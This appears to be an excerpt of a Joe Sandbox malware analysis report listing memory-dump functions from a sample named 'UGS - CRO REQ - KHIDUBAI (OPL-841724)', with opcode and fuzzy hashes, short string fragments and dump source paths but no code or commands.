API String ID: 0-1978589728
Opcode ID: 58390d580b22cc821e3997d95faf6828e27da5e9ac3f0013670e04985949694c
Instruction ID: 01add8eafedb37a406052f68c6bddbaeb4c0705053ab6e7012c7632cf3cd4470
Opcode Fuzzy Hash: 58390d580b22cc821e3997d95faf6828e27da5e9ac3f0013670e04985949694c
Instruction Fuzzy Hash: A33125753001009FC754DB68D868B2ABBF2EF89715F1601AAE50ACB3B2CA71EC05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0060DEF0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

,p, xrefs: 0060D899

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,p
API String ID: 0-2091407873
Opcode ID: f72c4d4aa0de3ffd43779505f26e7bc895d4e2a1c477d2b4acddf65b2adc4824
Instruction ID: bdea3834e432b344c0169fed60d57e321c080052f2692e45d4ee59296ad585c0
Opcode Fuzzy Hash: f72c4d4aa0de3ffd43779505f26e7bc895d4e2a1c477d2b4acddf65b2adc4824
Instruction Fuzzy Hash: 79317071A40128CFC7299B98C956BED7BB3BF88310F15429AE5059B3A1CB70DD41CF61

Uniqueness

Uniqueness Score: -1.00%

Function 006179C8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

Strings

xp, xrefs: 00617A12

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: xp
API String ID: 0-2915346237
Opcode ID: 2af37008c13c71bfd8381259e17ea20673a1ae6682f01db3fa6cb163c0ec3fc7
Instruction ID: d4f7be82f09977ef4160a7004146b7f804cfea68adf5d5f3ca2121b11a5b82ae
Opcode Fuzzy Hash: 2af37008c13c71bfd8381259e17ea20673a1ae6682f01db3fa6cb163c0ec3fc7
Instruction Fuzzy Hash: 13315034A092089FCB14DFA9D845BEEBBF2FF88310F14806AD505A7345D730AA85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 004F50F3 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

4'p, xrefs: 004F50D3

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 4'p
API String ID: 0-481844870
Opcode ID: 37617fa5da1a35c7c0873312cda0621ec3116d70d335da02f48b920404dcd97e
Instruction ID: 5bc2588f5b31a789685910c4c92cc5c6a04018d487328f6da49bc77a9cf5be78
Opcode Fuzzy Hash: 37617fa5da1a35c7c0873312cda0621ec3116d70d335da02f48b920404dcd97e
Instruction Fuzzy Hash: 74115931705B559FDB26162854202BFA797DFD2311B1800BFDB45DB382CD298C47839B

Uniqueness

Uniqueness Score: -1.00%

Function 00601AB8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

@)R, xrefs: 00601B73

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: @)R
API String ID: 0-1324940257
Opcode ID: 30e8c96fb1a9dd1b930f91c6783c1ef93417c6a032804fe1687b26d86b1c4353
Instruction ID: 47f0b9479c0120a116722055f2d3f6377951bf614404ba32b2f93d27ab3992d2
Opcode Fuzzy Hash: 30e8c96fb1a9dd1b930f91c6783c1ef93417c6a032804fe1687b26d86b1c4353
Instruction Fuzzy Hash: BE217135A002589FCB158F68C8549EE7FF2EF8D320F188569E411AB3A0DB758C86DF90

Uniqueness

Uniqueness Score: -1.00%

Function 0061DCEB Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

LRp, xrefs: 0061DCEB

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: LRp
API String ID: 0-3405495957
Opcode ID: 75d12156329043da933403285519238ad3b673723dff6af4cd53f78105d9eec9
Instruction ID: adf3a846129bde34356f9d8a53a879d2e942ba2d5acd0fbd166a9913447d1a31
Opcode Fuzzy Hash: 75d12156329043da933403285519238ad3b673723dff6af4cd53f78105d9eec9
Instruction Fuzzy Hash: 61218672B051255BDF149A78DC581EE73639FD820671A8E3AD4026F389CD786C09DBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00611158 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

(p, xrefs: 006111AC

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: 5f5791ade029b9074ccd539cc80086dd0b4fd7f4299af76ac4bced5bd7dbb684
Instruction ID: d4833e78cb50a99f66e4adb783fb20e3ef82a1a6a0dbbb158e57ae534da562a7
Opcode Fuzzy Hash: 5f5791ade029b9074ccd539cc80086dd0b4fd7f4299af76ac4bced5bd7dbb684
Instruction Fuzzy Hash: 5D217F36609254AFC7068F68E814C997FB6EF8A32031A81DAE505DF273C636DC16DB52

Uniqueness

Uniqueness Score: -1.00%

Function 04EFB970 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

V, xrefs: 04EFD951

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: V
API String ID: 0-1342839628
Opcode ID: b55b9035ffcf538bc91ae81f5960a23c8f728bacb0c6a7fc8df298b58cbb8a29
Instruction ID: c24464bc0c8b994bbef546aaed6b5291e0f1425b20e2493a8fe78aae318f2528
Opcode Fuzzy Hash: b55b9035ffcf538bc91ae81f5960a23c8f728bacb0c6a7fc8df298b58cbb8a29
Instruction Fuzzy Hash: A321CC317082508FD7116B29EC087667BE8DF85315F4A50B6C6448B642E370FC41C782

Uniqueness

Uniqueness Score: -1.00%

Function 006044C0 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

D@R, xrefs: 0060453C

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: D@R
API String ID: 0-4258169811
Opcode ID: 40f8a380d08577f6a1190025141989140dd9dcefcd1a07f3d7bfc4e6e254c125
Instruction ID: 0d73639dabe4f97a7832b09daa5f1efab8a341ec6d6e08c615ea3747bdfe69d4
Opcode Fuzzy Hash: 40f8a380d08577f6a1190025141989140dd9dcefcd1a07f3d7bfc4e6e254c125
Instruction Fuzzy Hash: 4811C6B1A882455FCB3E8764AC586EF7FA29B86355F1480AAD606C72D1EF744986CA00

Uniqueness

Uniqueness Score: -1.00%

Function 007D1265 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

TJp, xrefs: 007D1274

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: TJp
API String ID: 0-1978589728
Opcode ID: d0b507ced8f5a0f6cfdd6100cd4de8c5630a1eb88125dff3a4e09b2ca8cb986c
Instruction ID: f4cb9dba2771b1f4727916aef54609116049a67c849b4cbec6c21e4a6ded109e
Opcode Fuzzy Hash: d0b507ced8f5a0f6cfdd6100cd4de8c5630a1eb88125dff3a4e09b2ca8cb986c
Instruction Fuzzy Hash: 6C012B303042409BD325B7A4E45537E7BA2AFC4311F54056BD0028B756CE699D0883A2

Uniqueness

Uniqueness Score: -1.00%

Function 001E9390 Relevance: 1.3, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 001E93F2

Memory Dump Source

Source File: 00000002.00000002.418758880.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 257a8718549087456d32a2c8646ba6a1641dcd27cfb452124e6a6b829d31d372
Instruction ID: 5b2e9ea4402f34644aa8f75dc6e2e53cf6b1c89771156171340120ebc9137de6
Opcode Fuzzy Hash: 257a8718549087456d32a2c8646ba6a1641dcd27cfb452124e6a6b829d31d372
Instruction Fuzzy Hash: C3112871D003488BCB10DFAAD9487EEFBF5EB88324F248819D415A7344C775A944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0060F460 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

(p, xrefs: 0060F4AE

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: c02f9c4c3e676e886c619416fc0df0ceb59e7897b7d084f8b40adb0f7d6d5155
Instruction ID: c4b5534e69bec241ff6887c5eb962122c4f63575ba837507322ffe1e75b42625
Opcode Fuzzy Hash: c02f9c4c3e676e886c619416fc0df0ceb59e7897b7d084f8b40adb0f7d6d5155
Instruction Fuzzy Hash: EFF0A4213506205BD72D2329A8217BF3ADB8BC5754F14817BE906CB7C6CE298D0783D6

Uniqueness

Uniqueness Score: -1.00%

Function 04EFFF40 Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

LER, xrefs: 04EFFF49

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: LER
API String ID: 0-2393515566
Opcode ID: 17764b8ba2485692ca2073ac23c3190d8f745ef1ac92861c2cf436b0bac6eb90
Instruction ID: c063e841ee87af717c6527fa485313398e2a04ed2e2002d8d81d04ec3427f849
Opcode Fuzzy Hash: 17764b8ba2485692ca2073ac23c3190d8f745ef1ac92861c2cf436b0bac6eb90
Instruction Fuzzy Hash: 83E0EC70A01308EFDB00EFA4E95176DBBA9EF85200F5085A9E8059B245D9715F059B91

Uniqueness

Uniqueness Score: -1.00%

Function 04EFFEF8 Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

D@R, xrefs: 04EFFF01

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: D@R
API String ID: 0-4258169811
Opcode ID: b7d0b649c94333d2a08012a0ea363fc9172d9288fc114e69b53ce1d2a8cd1b3b
Instruction ID: eba104b1d6b4b038ae7be7e8b940bf82e3c16beec31b68a854b80b8e1704544f
Opcode Fuzzy Hash: b7d0b649c94333d2a08012a0ea363fc9172d9288fc114e69b53ce1d2a8cd1b3b
Instruction Fuzzy Hash: D7E01270A0030DEFC700DFA4E90569D7BF5EF45300F5045A9D509D7345D9355F059B91

Uniqueness

Uniqueness Score: -1.00%

Function 00617578 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

"b, xrefs: 00617578

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: "b
API String ID: 0-1171739819
Opcode ID: 13adf03f77602c0c3e7c2c80fe5063b2d77d7df7e3188e868aa290d3e6bd85f2
Instruction ID: 5ff69fd9c958cd8da4468580abe16b7ab7a038a7ed37ff9a98d0a1f664a9a2db
Opcode Fuzzy Hash: 13adf03f77602c0c3e7c2c80fe5063b2d77d7df7e3188e868aa290d3e6bd85f2
Instruction Fuzzy Hash: 2BD02E3020C2802FC301C624E821825BF718FA520030880AEEC08CB283E0239D1ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 004F5868 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c931270d9bdc89f812614e92d2975cdf4803799f16345cd31ab5d94097073e93
Instruction ID: 0549edf6692af03e27d3ca3b803b953b698cdf00eef47b56a7a9bed59b16390c
Opcode Fuzzy Hash: c931270d9bdc89f812614e92d2975cdf4803799f16345cd31ab5d94097073e93
Instruction Fuzzy Hash: 65025370A0061ACBDB24DF54C850BFEB7B2AF94300F60859ADA09B7740DBB49E85DF95

Uniqueness

Uniqueness Score: -1.00%

Function 006072B1 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b41eb8538be4aa81362e8ae395a0c6ac5d47448adf28672e9a661e9626248282
Instruction ID: a481bfcfa0a5b86d35b434d391c7b8b214b1bb953a725a698ceccda8b68ef7f0
Opcode Fuzzy Hash: b41eb8538be4aa81362e8ae395a0c6ac5d47448adf28672e9a661e9626248282
Instruction Fuzzy Hash: 3EE17231B44204DFDB18DF64D895BAEBBA2AF88310F148069E905DB3D2DB75ED45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004F2D50 Relevance: .4, Instructions: 363COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ee36d3392dc6e917268180cdbccdb70d7ef3e066fd9b7ea9b0baa0a745d31df
Instruction ID: 047290bf72f44aa2b80b0eed704df02d6723bcd1bf67fcf3c43a1f0fa97c34c6
Opcode Fuzzy Hash: 9ee36d3392dc6e917268180cdbccdb70d7ef3e066fd9b7ea9b0baa0a745d31df
Instruction Fuzzy Hash: FAC1823030224587E7186BDD98A873BE6FAAFE5701F10513FA706C73E9CEA49D099761

Uniqueness

Uniqueness Score: -1.00%

Function 004F5110 Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d61a3514079f167dcd9df914a850ec78debf5346799d5c0b03a7dfd5fe31e74
Instruction ID: 8446a6ea7c04ed07d4b5d27ff08a1b515820af0cb9498396c0411d0b335fde7f
Opcode Fuzzy Hash: 8d61a3514079f167dcd9df914a850ec78debf5346799d5c0b03a7dfd5fe31e74
Instruction Fuzzy Hash: DEB1C6703007059BEB50699AC4D177FE1DBAFD1701FA4093FAB0587299CEF88D854AAB

Uniqueness

Uniqueness Score: -1.00%

Function 00610276 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d4a54e258c640dd37273d9b68aa1cb3ba88525e3ea89ce89088df103fb1ee6f
Instruction ID: 53e8f23ddb27e37772222ace7e12f48a97630c38c10df9fabdd80a9ad64d5fc3
Opcode Fuzzy Hash: 8d4a54e258c640dd37273d9b68aa1cb3ba88525e3ea89ce89088df103fb1ee6f
Instruction Fuzzy Hash: 80A10D34B002148FDB58DF24C994B9AB7B2BF89310F5485A9E54AAB3A6DF709DC5CF40

Uniqueness

Uniqueness Score: -1.00%

Function 04EFB2C0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6623a956cdcda9aeb0a329f4d25a16dfc79a08219818084574e266a4e6ef25e2
Instruction ID: bdc9fc6bfd90411dac130d5e3675403ad95aa142fd77a31745effdfe257128b3
Opcode Fuzzy Hash: 6623a956cdcda9aeb0a329f4d25a16dfc79a08219818084574e266a4e6ef25e2
Instruction Fuzzy Hash: 6C81DD71B042098FDB04DFA4D898AEEBBF2EB99304F149066D505DB291E734BE46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00611218 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87366cb52a9eba464a3449ad12b4eda11c91fbb16f6f1b07e464a412472fa8f6
Instruction ID: 1af23a1ea84456661b276f2469f6bb7fa533ecebe5b5b6848030bba5724e2870
Opcode Fuzzy Hash: 87366cb52a9eba464a3449ad12b4eda11c91fbb16f6f1b07e464a412472fa8f6
Instruction Fuzzy Hash: 6E812A347502149FCB58DF68D894AAE77F6EF89710F1481A9E506DB3A6CB30EC42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006087A8 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 850499c2d0fe70e6f742b953422e436c79e8ded99d312c95a5a27f2de826a68b
Instruction ID: c239b8773a69a24cb18d3a7940d7c319d2f3ce4af1a57fc6c9b17b453e657216
Opcode Fuzzy Hash: 850499c2d0fe70e6f742b953422e436c79e8ded99d312c95a5a27f2de826a68b
Instruction Fuzzy Hash: E2811C75A40614DFCB18DF68C484A9EB7F6FF88310B158169E855DB3A1DB30ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0061345E Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d534fc9209a798c496e3c46be1d109f3880b3cc4fcba1c6683095478f0505b2c
Instruction ID: 992d381b973411d9fe4467ba5c7adb5040d08383606b12f15971b914b5b3f195
Opcode Fuzzy Hash: d534fc9209a798c496e3c46be1d109f3880b3cc4fcba1c6683095478f0505b2c
Instruction Fuzzy Hash: 6B712934B00614CFCB19EF68C454AADB7B3BF89700F24856DE4069B3A2CB759D86DB84

Uniqueness

Uniqueness Score: -1.00%

Function 006171B0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d923a3c8f551a007bd8add960f563930e6aee257f38179b2fb77bb28a126017b
Instruction ID: cb66ae038a48bd2e0ed563e753094cb9bf1b545d4f68ee9dbf69d0cbbe873adb
Opcode Fuzzy Hash: d923a3c8f551a007bd8add960f563930e6aee257f38179b2fb77bb28a126017b
Instruction Fuzzy Hash: 26716134B18204CFDB14EF95E449BEAB3B3EB88311F18C066E8059B399C7789DC59B91

Uniqueness

Uniqueness Score: -1.00%

Function 006173E4 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19395ceb43fc935784d6a8bf066c4545cc7d4c9829a997ba5a06f02d233efb25
Instruction ID: a3bece40e08b481f32f61a4e878da89006535f4e4c4f10bb992c3fe179e95ac0
Opcode Fuzzy Hash: 19395ceb43fc935784d6a8bf066c4545cc7d4c9829a997ba5a06f02d233efb25
Instruction Fuzzy Hash: FF614F34B18204CFD714EF95E449BEAB3B3EB88311F28C066E8059B799C7789DC59B91

Uniqueness

Uniqueness Score: -1.00%

Function 00619E00 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f56fb021b9638e25380a447cb2f26912c1e524fd3a11976c9b7f8195ac36082c
Instruction ID: f7aff302c8b6b0c43a4a2cb9ca5ba8d996b12e582b80448d6ec38058e89aa013
Opcode Fuzzy Hash: f56fb021b9638e25380a447cb2f26912c1e524fd3a11976c9b7f8195ac36082c
Instruction Fuzzy Hash: 866173306052049FD704EF99E959BEEB7B3EB88305F28C066E50597399CB349E86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00611209 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782897d3183b65863ee2fee5aefcd85c42eb237f91849310afd9855e154e595f
Instruction ID: 50e27bb5729ef6e7d4bfd91df2d19ff4b01de2ebb64ebd3b44823cd9911e533b
Opcode Fuzzy Hash: 782897d3183b65863ee2fee5aefcd85c42eb237f91849310afd9855e154e595f
Instruction Fuzzy Hash: C7612A347502149FCB18DF68D894AAEB7B6FF89710F148169E506DB3A6CB30EC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04EFAA88 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38faa72cb1b6fcbf11c9024edb519014fc91cc577e229cb03536d95b552989c3
Instruction ID: 3cc21e92decd09aab6739660bd99c25fd1d725a4f5cf4d7035f7074111a118a6
Opcode Fuzzy Hash: 38faa72cb1b6fcbf11c9024edb519014fc91cc577e229cb03536d95b552989c3
Instruction Fuzzy Hash: 4E513C347086008BD714BFA5E9093AB73A2EFC5700F10D175D5064B3CADB38AE4A97D2

Uniqueness

Uniqueness Score: -1.00%

Function 0061B878 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4856a336cecc58bbbfe38a58440ca910ec1257a6c0f65caeb82658505dc96433
Instruction ID: ce9f3333c7bec212cad0a7e8609cab061f6e98f10d4387f9fc4cbee7eb32a975
Opcode Fuzzy Hash: 4856a336cecc58bbbfe38a58440ca910ec1257a6c0f65caeb82658505dc96433
Instruction Fuzzy Hash: 2D51AF34B092048FDB04EBA9E4597EEB3B3EFC8710F28D166D4059B399DB349D858B91

Uniqueness

Uniqueness Score: -1.00%

Function 007D1C01 Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cf7f20755f42a838fb53fa309d4b813efbeb3e90d26ccc0665b5155ef3e84c9
Instruction ID: 8bfad82d581591e4de59265c8be5a2df5252b3f35acb76923afb5b4e57752bc8
Opcode Fuzzy Hash: 2cf7f20755f42a838fb53fa309d4b813efbeb3e90d26ccc0665b5155ef3e84c9
Instruction Fuzzy Hash: 18515974A48118DFCB14CF98D684AACBBB1BF18310FA14197D806AF366C778ED49DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0060C210 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba6c62669177dfd7f24572fba431f2f0e55c87dc44a1819a69195140e66e8bea
Instruction ID: bc2e9d3c6f082237b1df9ca350fc66ddb151d191d8245aa89b5ebdae5887ce9c
Opcode Fuzzy Hash: ba6c62669177dfd7f24572fba431f2f0e55c87dc44a1819a69195140e66e8bea
Instruction Fuzzy Hash: D4517134B01609DFCB18DF64E898BAE7776FF88711F10811AE5029B3A4DF309946DB91

Uniqueness

Uniqueness Score: -1.00%

Function 007D1C38 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa9a3615b105eedc1a028176c3ecef9e7b5e5bde4a5bae11a24d55475a96d286
Instruction ID: 4f767846ab28ae5a627363457401970621a38d0d26cd2674ef19148b64016732
Opcode Fuzzy Hash: fa9a3615b105eedc1a028176c3ecef9e7b5e5bde4a5bae11a24d55475a96d286
Instruction Fuzzy Hash: 2C516B75A08158DFCB14CF94C684A9CBBB1AF15310FA28197D856AF366C338ED4ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 0061ABF0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

